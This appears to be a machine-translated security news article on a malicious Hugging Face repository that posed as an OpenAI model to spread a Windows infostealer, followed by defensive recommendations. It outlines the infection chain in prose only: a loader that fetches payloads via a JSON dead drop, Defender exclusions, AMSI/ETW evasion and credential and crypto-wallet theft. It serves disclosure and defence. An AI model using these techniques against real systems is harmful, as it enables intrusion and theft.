The trend trap a malicious repository impersonated an OpenAI model and launched an infostealer on Windows

A malicious repository managed for hours to be on the Hugging Face's trend list by posing as the open-weight version of OpenAI's Privacy Filter model, and was used as a vector to distribute a infostealer oriented to Windows users. According to the analysis published by the HiddenLayer research team, the project cloned the description of the legitimate model to induce confidence, included instructions to run a batch on Windows and a charger on Python that, when executed, disable SSL verifications and downloaded orders from a JSON public service to finally launch an executable via PowerShell.

The attack shows two worrying features: on the one hand, the ability to transform an apparently harmless publication into a remote installer and, on the other, the use of public "dead drop solutions" such as JSON Keeper to change payloads without touching the original repository. The shipper used this technique to solve a web-coded URL that pointed to scripts housed in an infrastructure that has also been linked to previous campaigns that distributed ValleyRAT, a modular remote access Trojan associated with operators known for supply chain and phishing campaigns.

In the infection chain described, the second step raised privileges through a UAC notice, manipulated Microsoft Defender exclusions, installed a scheduled task to run the final binary and then erased local traces. The final component was designed to capture screens and exfilter credentials and data from cryptomoneda extensions and coins, as well as trying to evade detections by deactivating AMSI and ETW traces. Hugging Face disable access to the repository after detection, but before that the project would have reached the first position in trending and accumulated hundreds of thousands of downloads, numbers that researchers suspect were artificially inflated to generate confidence.

This incident highlights a paradigm shift: model and package platforms are no longer just passive repositories, they are potential initial access vectors that attackers try to exploit by combining social engineering, shared infrastructure and abuse of trust mechanisms such as positioning on popular lists. The consequences are relevant to both product equipment and developers and security officials: apparent popularity does not guarantee integrity and the execution of unreviewed downloaded scripts is a high-risk practice.

For users and equipment handling third-party models and artifacts, practical recommendations begin by applying the minimum principle of confidence: do not run startup scripts (start.bat, leader.py or others) without auditioning their content, run tests in isolated environments not connected to corporate networks, and prefer signed or verified loads and devices. If you need to test a model, do it on virtual machines with snapshots, control the outgoing traffic and analyze binaries and scripts with EDR tools and sandboxes. For repositories and packages, validate the identity of the author, check that the model corresponds to the official project (for example, using links and metadata in the official organization) and review the history of commitments and executable files included.

Modeling platforms must complement manual controls with automated scans that detect typosquating patterns, almost identical descriptions coincidences, scripts that run remote downloads or disable security checks, and metric handling signals (likes, downloads). It is also recommended to implement artefacts signatures and verify customer integrity before allowing local execution, as well as to provide managed inference environments that avoid arbitrary execution code by the user. Similar measures are reflected in supply chain protection guides and remote execution techniques described by agencies such as CISA and the ATT & CK frameworks should be consulted to tighten policies and detect: https: / / www.cisa.gov / supply-chain and https: / / attack.mitre.org / techniques / T1059 /.

If you suspect that you downloaded or executed the malicious repository content, disconnect the network's equipment, preserve evidence (logs, temporary files, executed scripts) and perform a forensic or remote analysis with a specialized supplier. It updates signatures and scanning of antivirus, reviews the programmed tasks and exclusions of Defender, and considers changing potentially compromised credentials and keys. Reporting the incident to the platform (Hugging Face in this case) and sharing indicators with the community helps contain the operation and protect other users: the resilience of the ecosystem depends on both technical controls and the rapid communication of abuse.